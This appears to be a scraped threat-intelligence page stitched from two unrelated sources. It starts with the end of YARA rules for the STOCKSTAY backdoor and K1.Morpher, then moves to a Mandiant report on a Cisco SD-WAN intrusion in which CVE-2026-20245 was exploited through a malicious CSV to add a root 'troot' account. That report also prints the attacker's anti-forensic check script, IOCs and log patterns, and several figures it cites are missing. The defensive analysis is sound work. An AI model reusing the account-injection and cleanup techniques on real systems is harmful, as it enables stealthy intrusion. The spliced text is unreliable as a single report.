$rate_control_1 = "\"rate_control\""
$service_1 = "\"service\""
$service_2 = "\"srv\""
$days_not_work_1 = "\"days_not_work\""
$days_not_work_2 = "\"dnw\""
$system_properties_1 = "\"system_properties\""
$system_properties_2 = "\"sp\""
condition:
any of ($internal_id*)
and any of ($internal_key*)
and any of ($interval_engine*)
and any of ($level_info*)
and any of ($time_scale*)
and any of ($span_min*)
and any of ($span_max*)
and any of ($rate*)
and any of ($service*)
and any of ($days_not_work*)
and any of ($system_properties*)
}
rule G_Backdoor_STOCKSTAY_CryptoContainer_1 {
meta:
author = "Google Threat Intelligence Group"
description = "Detects code for parsing crypto containers within STOCKSTAY components."
hash = "82707cfdf24dcb762f4615f01e1ba4d3dfdec4abe9cd588558d2634d7e6a5eeb"
strings:
$s1 = "BuildCryptoContainer"
$s2 = "ParseCryptoContainer"
$s3 = "Windows-1251" wide
$s4 = "AesCryptoServiceProvider"
$s5 = "RSACryptoServiceProvider"
condition:
uint16(0) == 0x5a4d
and all of them
}
rule G_Hunting_K1MORPHER_3 {
meta:
author = "Google Threat Intelligence Group"
description = "Detects the Squirrel3 RNG implemented within K1.Morpher"
hash = "391e51354118fb87dc57650cbbd94258c3f7c0a0d6868040b7a473ad626ff25e"
strings:
$squirrel3_code_1 = {
03 // ldarg.1
7E??????04 // ldsfld <token>
5A // mul
02 // ldarg.0
58 // add
25 // dup
1E // ldc.i4.8
64 // shr.un
61 // xor
7E??????04 // ldsfld <token>
58 // add
25 // dup
1E // ldc.i4.8
62 // shl
61 // xor
7E??????04 // ldsfld <token>
5A // mul
25 // dup
1E // ldc.i4.8
64 // shr.un
61 // xor
2A // ret
}
condition:
dotnet.is_dotnet
and all of them
}
Acknowledgements
This analysis would not have been possible without the assistance of Gabby Roncone for technical review. We also appreciate GitHub for their collaboration against this threat.
Written by: Chester Sng, Pete Boonyakarn, Logeswaran Nadarajan, Lukasz Lamparski
Introduction
In early 2026, Mandiant identified a threat actor targeting SD-WAN infrastructure at a service provider. After gaining initial access, the threat actor exploited a zero-day vulnerability (CVE-2026-20245) in Cisco Catalyst SD-WAN to escalate privileges from a compromised administrative account to root-level access.
The vulnerability stems from the device’s file upload feature lacking the ability to properly filter malicious data.
Throughout the intrusion, to maintain operational security and avoid detection, the threat actor consistently employed anti-forensic techniques, selectively deleting and restoring system configuration files that were modified during their activities.
Key Observations
Rogue Peering and Credential Manipulation: In March 2026, a threat actor established initial access via unauthorized peering connections to facilitate Secure Shell (SSH) access. The threat actor used that access to manipulate default account passwords to evade detection.
Exploitation of CVE-2026-20245: Subsequently, the attacker leveraged a zero-day privilege escalation vulnerability (now tracked as CVE-2026-20245) in Cisco Catalyst SD-WAN Manager to gain root-level access via a malicious CSV upload.
Extensive Anti-Forensic Cleanup: The threat actor deleted malicious files, reverted configuration changes, and executed a validation script to ensure indicators are purged.
What is SD-WAN?
Traditional Wide Area Networks (WANs) rely heavily on physical, proprietary hardware routers to direct traffic. This model is often rigid, complex to scale, and struggles to handle the demands of modern cloud computing.
Software-Defined Wide Area Network (SD-WAN) solves this by decoupling the network’s management and control logic from the underlying physical hardware. Instead of configuring individual routers one by one, a centralized software controller is used to orchestrate the entire network from a single dashboard. SD-WANs are typically used by highly distributed organizations, such as banks, retail corporations, technology services, and healthcare providers, to securely connect multiple remote branch locations directly to central cloud services.
What is Peering?
Within an SD-WAN fabric, peering is the logical process of establishing a trusted, authenticated relationship between distinct network components, such as edge routers, regional hubs, and central controllers.
Before any data can be securely transmitted across the network fabric, these devices must perform a digital handshake. During the peering phase, devices mutually authenticate each other using cryptographic certificates. Once identity and trust are verified, they exchange underlying routing tables and automatically build secure tunnels to facilitate safe data transport.
Additional Vulnerabilities in Cisco Catalyst SD-WAN Controllers
CVE-2026-20127 and CVE-2026-20182 are critical vulnerabilities recently disclosed by Cisco that affect the peering authentication mechanism for Cisco Catalyst SD-WAN controllers. Both vulnerabilities could allow an unauthenticated, remote attacker to bypass authentication and obtain administrative privileges.
Intrusion Campaign Overview
Initial Access Via Rogue Peering Connections
From late 2025 to January 2026, Mandiant observed multiple unauthorized peering connections to the victim’s SD-WAN Manager devices. It is possible that these connections occurred due to the exploitation of CVE-2026-20127 or CVE-2026-20182 as the vulnerabilities were not disclosed, and patches were not available during this period.
Beginning in March 2026, further unauthorized peering connections were seen on a device running a software version unaffected by CVE-2026-20127. However, Cisco confirmed that these connections did not leverage CVE-2026-20182 either, and could instead be using stolen certificate material from a previous compromise of the same device.
It is unclear if the same threat actor was responsible for the late 2025 to January 2026 and March 2026 rogue peering activity.
Successful Authentications By Altering The Admin Account Password
In March 2026, the threat actor established new rogue peer connections and successfully authenticated to the SD-WAN Manager device via SSH using the vmanage-admin account on the same victim devices.
Once authenticated via SSH, the threat actor executed commands to change the password of the default admin account. The threat actor authenticated directly to the SD-WAN Manager web application interface using the admin account and exfiltrated configurations of the SD-WAN fabric.
Figure 1: Threat actor authentication and configuration extraction
The threat actor subsequently used their active vmanage-admin session to change the password of the admin account back to its original state before terminating their active session. This activity was likely performed to reduce the probability of detection by an administrator trying to log into the device during day-to-day operations.
The vmanage-admin and admin accounts are default accounts on Cisco Catalyst SD-WAN controllers that have different privileges, but neither possesses root shell access.
Exploitation of CVE-2026-20245 to Escalate Privileges
Mandiant observed that in April 2026, after establishing an SSH session with the admin account, the threat actor exploited CVE-2026-20245 by executing the following command to upload a file named evil_tenant.csv:
CVE-2026-20245, a vulnerability reported to Cisco by Mandiant, exists in the command-line interface (CLI) of Cisco Catalyst SD-WAN Controllers that could allow an authenticated, local attacker to execute arbitrary commands as root by supplying a crafted file to the affected system.
The evil_tenant.csv file contains the exploit payload. The following code block (Figure 3) shows a snippet of the exploit which attempts to append malicious entries to the system's /etc/passwd and /etc/shadow files.
Through this command, the threat actor achieved the following:
Backed up the original vbond_vsmart_tenant_list configuration file, which would have been overwritten by the contents of evil_tenant.csv during the exploit. This backup was likely created to allow the actor to restore the file later, ensuring the SD-WAN Manager device did not load an invalid configuration that might alert administrators.
Created backups of the original /etc/passwd and /etc/shadow files.
Created a user account named troot with full root privileges.
Mandiant subsequently observed the threat actor accessing this new troot account from the admin account via the su (substitute user) command.
Anti-Forensic Techniques
Mandiant identified that the threat actor deleted all files they created, including evil_tenant.csv, and restored any system configurations they modified. These deletion and modifications were done to minimize their forensic footprint.
In addition to this, Mandiant also observed execution of a validation script, which checks if indicators of the threat actor's activities are removed.
for f in /home/admin/evil_tenant.csv /home/admin/.orig_vbond_vsmart_tenant_list /home/admin/.orig_vbond_vsmart_tenant_list.state /home/admin/.orig_passwd /home/admin/.orig_shadow;
do if [ -e "$f" ];
then echo PRESENT:$f; ls -ld "$f";
else echo ABSENT:$f;
fi;
done;
if grep -q '^troot:' /etc/passwd;
then echo PRESENT:/etc/passwd:troot;
else echo ABSENT:/etc/passwd:troot;
fi;
if [ -e /usr/share/viptela/vbond_vsmart_tenant_list ];
then echo PRESENT:/usr/share/viptela/vbond_vsmart_tenant_list; ls -ld /usr/share/viptela/vbond_vsmart_tenant_list;
else echo ABSENT:/usr/share/viptela/vbond_vsmart_tenant_list;
fi
Figure 4: Validation script
This script checks for the presence of the following:
Threat actor-created files in /home/admin.
troot account in the passwd and shadow files.
vbond_vsmart_tenant_list, and if it exists, inspect information about the file. This is likely to check if the original file was restored.
Outlook and Implications
This campaign underscores the living off the edge paradigm, where threat actors prioritize the compromise of network appliances to bypass traditional security perimeters. As organizations increasingly adopt software-defined networking, the orchestrators managing these environments become primary targets. These devices offer a black box environment for threat actors: they often lack the telemetry required for deep forensic analysis, and their role as a central control plane provides a stealthy platform for persistent, wide-scale access to internal enterprise traffic. For state-sponsored actors, the ability to exploit zero-day vulnerabilities in these platforms remains a premier vector for long-term strategic intelligence collection. Google Threat Intelligence Group (GTIG) has closelytrackedandreported on increased zero-day exploitation of edge devices over the past several years.
Remediation and Hardening
Perform IOC Sweep / Threat Hunting: Collect logs and diagnostic data from SD-WAN devices by executing request admin-tech command on all control-plane components. Scan these collections for known IOCs and execute threat hunts focused on the TTPs identified in the Detections and Hunting section of this blog post. If true positive hits are observed, perform a full investigation.
Manual Remediation Support: As per Cisco’s guidance, any confirmed indicators of compromise or suspicious activity should be forwarded to Cisco Technical Assistance Center (TAC) for comprehensive review and remediation assistance.
Prioritize Immediate Patching and Upgrades: Organizations must prioritize upgrading Cisco Catalyst SD-WAN Manager to fixed software releases, specifically versions 20.9.9.2, 20.12.7.2, 20.15.4.5, 20.15.5.3, 20.18.3.1, 26.1.1.2, or later, to remediate CVE-2026-20245.
Implement Cisco Catalyst SD-WAN Hardening and Logging Guidelines: Organizations should follow the comprehensive security best practices and configuration standards detailed in the Cisco Catalyst SD-WAN Hardening Guide. This guide provides a robust defense-in-depth framework for securing all SD-WAN components including the management, control, and data planes against unauthorized access.
Indicators of Compromise (IOCs)
To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a free GTI Collection for registered users.
Network Indicators
Description
Indicator
IP address connecting as rogue device and exploiting CVE-2026-20245
126.51.108[.]152
IP address connecting as rogue device
76.92.245[.]217
IP address connecting as rogue device
207.190.37[.]94
IP address connecting as rogue device
23.245.7[.]178
IP address connecting as rogue device
153.186.231[.]233
IP address connecting as rogue device
167.179.79[.]189
IP address connecting as rogue device
45.32.38[.]160
IP address connecting as rogue device
209.137.225[.]101
File Indicators
Due to the threat actor's extensive anti-forensic cleanup, several files associated with this intrusion were overwritten or deleted. However, forensic remnants of the malicious CSV payload were recovered.
Filename
Description
SHA256
/home/admin/.orig_vbond_vsmart_tenant_list
Backup configuration file
Not recovered
/home/admin/.orig_vbond_vsmart_tenant_list.state
State file
Not recovered
/home/admin/.orig_passwd
Backup password file
Not recovered
/home/admin/.orig_shadow
Backup password file
Not recovered
/home/admin/evil_tenant.csv
Remnant of malicious CSV file exploiting CVE-2026-20245
Mandiant encourages organizations to conduct proactive threat hunts focused on the tactics, techniques, and procedures (TTPs) outlined in this report to identify activity that may otherwise blend into routine operations. Because certain indicators of compromises may mirror legitimate administrative actions, it is critical to assess these observations against the established network posture to minimize false positives.
As per Cisco’s guidance, any suspicious activity or confirmed IOCs should be forwarded to the Cisco TAC for comprehensive review and assistance.
Unauthorized SSH Connections as vmanage-admin
Monitor authentication logs (/var/log/auth.log) for logins originating from unexpected external IP addresses using the vmanage-admin user account.
Jan 01 07:58:00 vManage sshd[20766]: Accepted publickey for vmanage-admin from <Threat Actor IP> port 48373 ssh2: RSA SHA256:<redacted>
Jan 01 08:01:00 vManage sshd[25178]: Accepted keyboard-interactive/pam for admin from <Threat Actor IP> port 60552 ssh2
Figure 5: SSH from unexpected origins
Suspicious Password Change Events
Audit password changes in /var/log/auth.log targeting the admin account in quick succession, particularly where credentials are set and subsequently reverted.
Jan 01 08:00:00 vManage usermod[12345]: change user 'admin' password
Jan 01 08:15:00 vManage usermod[12345]: change user 'admin' password
Figure 6: Password changes
Defenders should also inspect rollback files present within /var/confd/rollback/ for configuration delta commits targeting user passwords:
Audit terminal command history and system logs (/var/log/auth.log) for successful switch user (su) executions from the admin account to unauthorized accounts (e.g., troot).
Jan 01 08:03:00 vManage su[24289]: Successful su for troot by admin
Figure 8: su logins
Exploitation of CVE-2026-20245
Monitor script logs (/var/log/scripts.log) for execution anomalies involving unauthorized execution of vconfd_script_upload_tenant_list.sh.
Jan 01 08:01:05 vManage vScript: Tenant list upload per vsmart serial number: /usr/bin/vconfd_script_upload_tenant_list.sh -cli path /home/admin/evil_tenant.csv vpn 0
Jan 01 08:01:05 vManage vScript: uploading tenant list via VPN 0 true
Jan 01 08:01:05 vManage vScript: Copying ... /home/admin/evil_tenant.csv via VPN 0
Jan 01 08:01:05 vManage vScript: Successfully loaded the tenant placement file
Figure 9: Execution anomalies
Defenders can also query active command execution history using show history within the Viptela CLI for the specific administrative upload commands:
Google SecOps customers have access to these broad category rules and more under the Mandiant Intel Emerging Threats rule pack. The activity discussed in the blog post is detected in Google SecOps under the rule names:
Privileged Account Append to Passwd Database
Grep Privileged User Account Discovery in Passwd or Shadow
Hidden Backup of Sensitive System Files
Suspicious Copy from Usr Share to User Hidden Directory
Acknowledgements
Mandiant would like to thank the Cisco Product Security Incident Response Team (PSIRT) for their collaboration and partnership throughout the coordinated disclosure process.